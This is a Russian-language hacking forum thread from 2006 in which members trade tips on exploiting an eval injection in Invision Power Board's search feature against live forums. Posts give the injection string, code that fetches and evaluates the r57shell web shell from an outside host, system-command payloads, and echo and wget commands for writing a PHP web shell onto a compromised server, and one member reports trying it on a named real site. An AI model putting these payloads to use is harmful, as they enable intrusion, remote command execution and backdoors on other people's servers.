 |
|
01.05.2006, 18:06
|
|
Новичок
Регистрация: 20.04.2006
Сообщений: 5
С нами:
10557247
Репутация:
0
|
|
Добавил &lastdate=z|eval.*?%20//)%23e%00 и появилась вверху такая надпись:
Код:
IPB WARNING [2] include() [function.include]: URL file-access is disabled in the server configuration (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include(http://rst.void.ru/download/r57shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include() [function.include]: Failed opening 'http://rst.void.ru/download/r57shell.txt' for inclusion (include_path='.:/opt/php/lib/php:/home/users/e/evsu/incs') (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
На локалке всё прошло на ура, а вот уже в инете так. |
|
|
01.05.2006, 18:31
|
|
Познающий
Регистрация: 03.04.2006
Сообщений: 31
С нами:
10581071
Репутация:
14
|
|
Да сейчас много где это идет на ура (мега респект автару) но то что мне действительно нодо не кактит...
|
|
|
|
01.05.2006, 18:51
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами:
10946149
Репутация:
116
|
|
Там не дает просто белая страничка, еще одно Otaku пишет то на сниффер придёт
а если у меня нет снифера куда тогда оно предет? ) ладно если будет минутка помогите
разабратся) спосибо
Аффтар ты!!!
Например вот неплохой сниффер ресурс:
http://s.netsec.ru/
|
|
|
|
01.05.2006, 18:59
|
|
Новичок
Регистрация: 25.01.2006
Сообщений: 8
С нами:
10678837
Репутация:
2
|
|
Сообщение от Sanyk36
Добавил &lastdate=z|eval.*?%20//)%23e%00 и появилась вверху такая надпись:
Код:
IPB WARNING [2] include() [function.include]: URL file-access is disabled in the server configuration (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include(http://rst.void.ru/download/r57shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
IPB WARNING [2] include() [function.include]: Failed opening 'http://rst.void.ru/download/r57shell.txt' for inclusion (include_path='.:/opt/php/lib/php:/home/users/e/evsu/incs') (Line: 1 of /sources/action_public/search.php(1263) : regexp code(1) : eval()'d code)
На локалке всё прошло на ура, а вот уже в инете так. Запрещено использование include попробуйте с помощью php фаила, приложенного в архиве закодить что-нибудь наподобии.
$file=join("",file("http://rst.void.ru/download/r57shell.txt"));
eval($file);
и его заслать
|
|
|
|
02.05.2006, 10:49
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами:
11087066
Репутация:
561
|
|
|
|
|
|
02.05.2006, 15:53
|
|
Новичок
Регистрация: 11.03.2006
Сообщений: 16
С нами:
10614577
Репутация:
2
|
|
Сообщение от Go0o$E
Очень даже хорошо работает exploit! Проверил на lineageii.ru.
Не знаю почему, но на форуме lineageii.ru, у меня не выполняются никакие команды, ни под винду, ни под линукс. Хотя тема создаётся... Если делаю ручками, то тож не пашет.
Кстати часто на форумах сплойт не воспроизводит команды, а ручками всё работает. Может это из-за того что я не правил сплойт...
И ещё: когда я постю сообщение, например
Код:
eval(system(ls)); //'
то при поиске выдаёт файлы, лежащие на сервере, а когда например:
Код:
eval(system(ls -la)); //'
то мне выдаётся:
IPB WARNING [2] system(): Cannot execute a blank command (Line: 1 of /sources/search.php(1236) : regexp code)
Почему так?
Последний раз редактировалось L1on; 02.05.2006 в 16:06..
|
|
|
|
02.05.2006, 15:59
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами:
10840706
Репутация:
547
|
|
Они уже пропатчили форум.
|
|
|
|
02.05.2006, 16:46
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами:
10761096
Репутация:
27
|
|
я нашол форум ломаемы.... но он на винде... там пашет dir, md и т.д.
как можно закачать шелл или скачать сонфиг... бо не получаеться! =(
|
|
|
|
02.05.2006, 17:39
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами:
11269766
Репутация:
345
|
|
Сообщение от Grema
я нашол форум ломаемы.... но он на винде... там пашет dir, md и т.д.
как можно закачать шелл или скачать сонфиг... бо не получаеться! =(
Шелл примерно так. Узнай путь и напиши выполни.
echo "<? include($xxx); ?>" > c:\xxx2.txt
причем файл создаться с ковычками, но они не должны повлиять на код.
Или как показано в http://video.antichat.ru/file196.html через ФТП команды.
а линуксовская команда CAT равнозначна мелкомягкой TYPE
(type c:\xxx2.txt)
|
|
|
|
02.05.2006, 18:16
|
|
Новичок
Регистрация: 02.05.2006
Сообщений: 2
С нами:
10540355
Репутация:
0
|
|
а если сервак на linux, echo ведь прокатит?
вот такой код
echo "<? system($_GET['c']) ?> " > ./shell.php
запишет в shell.php строку с system? а то у меня не получается.
и еще как то странно себя ведет wget я делаю cd ./uploads/; wget _http://serv/shell.php;
вроде бы записывает в файл, файл появляеться. но когда его запускаю, он показывает файлы с моего сервера... что делать?
Последний раз редактировалось 4lex; 02.05.2006 в 18:44..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
